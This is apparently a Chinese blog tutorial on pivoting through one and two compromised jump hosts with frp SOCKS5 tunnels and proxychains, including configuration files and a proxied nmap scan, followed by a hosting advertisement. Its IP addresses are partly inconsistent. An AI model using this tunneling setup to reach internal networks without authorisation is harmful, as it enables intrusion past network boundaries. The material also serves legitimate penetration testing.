10.1.200.10 攻击机
10.1.200.20/172. 16.200.20 跳板机1
172.16.30/192.168.33.30 跳板机2
192.168.33.66 目标
frpc是frp的客户端客户端一般安装在被渗透机器上,在不需要双层内网渗透的情况下只需要上传frpc
配置文件:
[common]
server_addr = 192.168.1.20 //frps服务ip
server_port = 7000 //frps服务端口
[socks5]
type = tcp
plugin = socks5
remote_port = 5000 //渗透机或跳板机使用的端口
frps是frp的服务端frps是frp的服务端单层内网情况下只安装在渗透机,双层内网需要安装在跳板机中。
配置文件:
[common]
bind_port = 7000 //frps的服务端的端口
运行frpc: ./frpc -c frpc.ini(配置文件)
frps: ./frps -c frps.ini(配置文件)
配置使用的代理(linux)leafpad /etc/proxychains.conf
添加socks5 127.0.0.1 5000,这里的5000对应上frpc.ini配置文件中的socks5代理端口
proxychains nmap -Pn -sT -T4 192.168.1.20 代理nmap扫描
双层内网配置渗透机
proxychains.conf配置
socks5 127.0.0.1 8000 172段
socks5 127.0.0.1 9000 192段
10.1.200.10 本机ip10.1.200.10,代理端口8000 172段 代理端口9000 192段
frps配置:
[common]
bind_port = 7000 //frps服务的端口非代理端口
跳板机1
10.1.200.20/172. 16.200.20 //双网卡主机
frps配置
[common]
bind_port = 7000 //frps服务的端口非代理端口
frpc配置
[common]
server_addr = 10.1.200.10
server_port = 7000
[socks5_172]
type = tcp
plugin = socks5
remote_port = 8000 //172段sockts5代理端口(渗透机)
[socks5_192]
type = tcp
local_ip = 127.0.0.1
local_port = 9999 //跳板机2的sockts5代理端口
remote_port = 9000 //192段sockts5代理端口(渗透机)
说明:跳板机1向渗透机代理两个sockts5端口分别是8000端口和9000端口,8000端口代表172段是跳板机本机能访问的,
9000端口是192段跳板机1本来是不能访问但是获取了跳板机2的权限配置了代理因此可以相当于转发了跳板机2的流量。
跳板机2
172.16.30/192.168.33.30 //双网卡主机
frpc配置
[common]
server_addr = 172. 16.200.20
server_port = 7000
[socks5_192_172]
type = tcp
plugin = socks5
remote_port = 9999
说明:跳板机2只需要配置frpc即可,frps的ip地址填写的是跳板机1的ip并且对应上跳板机1的sockts5代理端口,最终使得渗透机可以访问目标。
你是否还在寻找稳定的海外服务器提供商?创新互联www.cdcxhl.cn海外机房具备T级流量清洗系统配攻击溯源,准确流量调度确保服务器高可用性,企业级服务器适合批量采购,新人活动首月15元起,快前往官网查看详情吧
成都创新互联成立于2013年,我们提供高端网站建设、成都网站制作公司、成都网站设计、网站定制、成都全网营销推广、小程序制作、微信公众号开发、网站推广服务,提供专业营销思路、内容策划、视觉设计、程序开发来完成项目落地,为成都服务器托管企业提供源源不断的流量和订单咨询。